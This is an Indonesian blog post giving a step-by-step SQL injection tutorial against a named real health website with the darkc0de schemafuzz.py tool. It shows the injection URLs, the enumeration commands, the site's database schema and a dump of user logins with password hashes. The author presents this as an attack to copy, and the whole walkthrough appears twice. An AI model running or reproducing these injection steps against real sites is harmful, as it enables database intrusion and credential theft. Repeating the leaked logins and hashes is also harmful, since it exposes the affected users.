* Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
* Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
* CMD
Pertama-tama Jalankan CMD lalu masuk ke directory dimana file schemafuzz.py berada
Awali perintah dengan format: schemafuzz.py -u “url target” –perintah
-=[Cari Target]=-
Misal : http://www.solusisehat.net/berita.php?id=365
-=[Mulai Perintah]=-
Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u “http://www.solusisehat.net/berita.php?id=365″ –findcol
maka keluar :
[+] URL:http://www.solusisehat.net/berita.php?id=365–
[+] Evasion Used: “+” “–”
[+] 13:35:09
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,4,5,6,
[+] Column Length is: 7
[+] Found null column at column #: 0
[+] SQLi URL: http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6–
[+] darkc0de URL: http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6
[-] Done!
-=[Cari Database]=-
Cari database dg command –dbs
Misal : schemafuzz.py -u “http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6″ –dbs
Maka keluar:
[+] URL:http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 13:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: u4554_solcom
User: u4554_solcom@localhost
Version: 5.0.27-standard
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] u4554_solcom
[-] [13:37:28]
[-] Total URL Requests 3
[-] Done
Nah dari situ kita dapet informasi bahwa nama databasenya : u4554_solcom
-=[Cari Nama Tabel Yang Mengandung Username dan Password]=-
Misal : schemafuzz.py -u “http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6″ –schema -D u4554_solcom
Maka keluar:
[+] URL:http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 13:43:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: u4554_solcom
User: u4554_solcom@localhost
Version: 5.0.27-standard
[+] Showing Tables & Columns from database “u4554_solcom”
[+] Number of Tables: 19
[Database]: u4554_solcom
[Table: Columns]
[0]gallery: nama,namafile,kategori,id,width,height,size
[1]kat_gal: id_gal,kategori,date
[2]ssc_artikel: id,judul,isi,tanggal_update,jenis_artikel,pengisi,
sys_jenis_data,aktif
[3]ssc_berita: id,judul,isi,pengisi,tanggal_update,aktif,sys_jenis_data
[4]ssc_buku_tamu: id,komentar,oleh,tanggal,aktif
[5]ssc_direktori: id,nama,jenis_direktori,lokasi,alamat_lengkap,telpon,faksimile,
kontak_person,keterangan
[6]ssc_forum: id,judul,isi,penanya,tanggal_update
[7]ssc_info_obat: id,nama_generik,nama_dagang,catatan
[8]ssc_jenis_artikel: id,jenis_artikel
[9]ssc_jenis_direktori: jenis_direktori
[10]ssc_jenis_pekerjaan: id,jenis_pekerjaan
[11]ssc_kamus_kesehatan: kata,keterangan
[12]ssc_level_pemakai: Levelnya
[13]ssc_lokasi: lokasi
[14]ssc_tanya_jawab: id,judul,pertanyaan,penanya,tanggal_tanya,jawaban,penjawab,
tanggal_update,aktif,sys_jenis_data
[15]ssc_tips: id,judul,isi,pengisi,tanggal_update,aktif,sys_jenis_data
[16]ssc_user: nama_login,sandi,nama_lengkap,alamat_lengkap,jenis_kelamin, nomor_telpon,pekerjaan,alamat_email,status_pernikahan,
tempat_lahir,tanggal_lahir,nama_samaran,
level_pemakai,aktif,tanggal_data_dibuat,
tanggal_terakhir_data_diupdate
[17]ssc_voting_pertanyaan: id,pertanyaan,aktif,tanggal_update
[18]ssc_voting_pilihan: id,id_pertanyaan,pilihan,jumlah
[-] [13:54:10]
[-] Total URL Requests 101
[-] Done
Berarti web itu punya 18 tabel. Nama kolomnya yang mengandung username and password juga udah ada tinggal pilih deh mana yang mau ditelanjangin…
-=[Melihat Isi dari Suatu Tabel dan Kolom]=-
Misal : schemafuzz.py -u “http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6″ –dump -D u4554_solcom -T ssc_user -C nama_login,sandi
Maka muncul :
[+] URL:http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 14:02:36
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: u4554_solcom
User: u4554_solcom@localhost
Version: 5.0.27-standard
[+] Dumping data from database “u4554_solcom” Table “ssc_user”
[+] Column(s) ['nama_login', 'sandi']
[+] Number of Rows: 16412
[0] lhukie:2350538419934368:
[1] chaerul:2350538419934368:
[2] bambang:2350538419934368:
[3] regina:2350538419934368:
[4] admin:2fbd2ef919d06770:
[5] ginung:2350538419934368:
[6] Ardi:0f5219dc11e0f77a:
[7] yesi:7b10fc7008fadabc:
[8] noviana:533e8d92566a1adc:
[9] 2009:266d4c0f6ba9731d:
[10] ifah:565491d704013245:
[11] Chairul:747fc82325405198:
[12] dini:565491d704013245:
[13] asnawi:4f49578d3ba2670a:
[14] juhaidianto:4f49578d3ba2670a:
[15] novi:67976659723ec552:
* Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
* CMD
Pertama-tama Jalankan CMD lalu masuk ke directory dimana file schemafuzz.py berada
Awali perintah dengan format: schemafuzz.py -u “url target” –perintah
-=[Cari Target]=-
Misal : http://www.solusisehat.net/berita.php?id=365
-=[Mulai Perintah]=-
Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u “http://www.solusisehat.net/berita.php?id=365″ –findcol
maka keluar :
[+] URL:http://www.solusisehat.net/berita.php?id=365–
[+] Evasion Used: “+” “–”
[+] 13:35:09
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,4,5,6,
[+] Column Length is: 7
[+] Found null column at column #: 0
[+] SQLi URL: http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6–
[+] darkc0de URL: http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6
[-] Done!
-=[Cari Database]=-
Cari database dg command –dbs
Misal : schemafuzz.py -u “http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6″ –dbs
Maka keluar:
[+] URL:http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 13:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: u4554_solcom
User: u4554_solcom@localhost
Version: 5.0.27-standard
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] u4554_solcom
[-] [13:37:28]
[-] Total URL Requests 3
[-] Done
Nah dari situ kita dapet informasi bahwa nama databasenya : u4554_solcom
-=[Cari Nama Tabel Yang Mengandung Username dan Password]=-
Misal : schemafuzz.py -u “http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6″ –schema -D u4554_solcom
Maka keluar:
[+] URL:http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 13:43:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: u4554_solcom
User: u4554_solcom@localhost
Version: 5.0.27-standard
[+] Showing Tables & Columns from database “u4554_solcom”
[+] Number of Tables: 19
[Database]: u4554_solcom
[Table: Columns]
[0]gallery: nama,namafile,kategori,id,width,height,size
[1]kat_gal: id_gal,kategori,date
[2]ssc_artikel: id,judul,isi,tanggal_update,jenis_artikel,pengisi,
sys_jenis_data,aktif
[3]ssc_berita: id,judul,isi,pengisi,tanggal_update,aktif,sys_jenis_data
[4]ssc_buku_tamu: id,komentar,oleh,tanggal,aktif
[5]ssc_direktori: id,nama,jenis_direktori,lokasi,alamat_lengkap,telpon,faksimile,
kontak_person,keterangan
[6]ssc_forum: id,judul,isi,penanya,tanggal_update
[7]ssc_info_obat: id,nama_generik,nama_dagang,catatan
[8]ssc_jenis_artikel: id,jenis_artikel
[9]ssc_jenis_direktori: jenis_direktori
[10]ssc_jenis_pekerjaan: id,jenis_pekerjaan
[11]ssc_kamus_kesehatan: kata,keterangan
[12]ssc_level_pemakai: Levelnya
[13]ssc_lokasi: lokasi
[14]ssc_tanya_jawab: id,judul,pertanyaan,penanya,tanggal_tanya,jawaban,penjawab,
tanggal_update,aktif,sys_jenis_data
[15]ssc_tips: id,judul,isi,pengisi,tanggal_update,aktif,sys_jenis_data
[16]ssc_user: nama_login,sandi,nama_lengkap,alamat_lengkap,jenis_kelamin, nomor_telpon,pekerjaan,alamat_email,status_pernikahan,
tempat_lahir,tanggal_lahir,nama_samaran,
level_pemakai,aktif,tanggal_data_dibuat,
tanggal_terakhir_data_diupdate
[17]ssc_voting_pertanyaan: id,pertanyaan,aktif,tanggal_update
[18]ssc_voting_pilihan: id,id_pertanyaan,pilihan,jumlah
[-] [13:54:10]
[-] Total URL Requests 101
[-] Done
Berarti web itu punya 18 tabel. Nama kolomnya yang mengandung username and password juga udah ada tinggal pilih deh mana yang mau ditelanjangin…
-=[Melihat Isi dari Suatu Tabel dan Kolom]=-
Misal : schemafuzz.py -u “http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6″ –dump -D u4554_solcom -T ssc_user -C nama_login,sandi
Maka muncul :
[+] URL:http://www.solusisehat.net/berita.php?id=365+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6–
[+] Evasion Used: “+” “–”
[+] 14:02:36
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: u4554_solcom
User: u4554_solcom@localhost
Version: 5.0.27-standard
[+] Dumping data from database “u4554_solcom” Table “ssc_user”
[+] Column(s) ['nama_login', 'sandi']
[+] Number of Rows: 16412
[0] lhukie:2350538419934368:
[1] chaerul:2350538419934368:
[2] bambang:2350538419934368:
[3] regina:2350538419934368:
[4] admin:2fbd2ef919d06770:
[5] ginung:2350538419934368:
[6] Ardi:0f5219dc11e0f77a:
[7] yesi:7b10fc7008fadabc:
[8] noviana:533e8d92566a1adc:
[9] 2009:266d4c0f6ba9731d:
[10] ifah:565491d704013245:
[11] Chairul:747fc82325405198:
[12] dini:565491d704013245:
[13] asnawi:4f49578d3ba2670a:
[14] juhaidianto:4f49578d3ba2670a:
[15] novi:67976659723ec552:
Tidak ada komentar:
Posting Komentar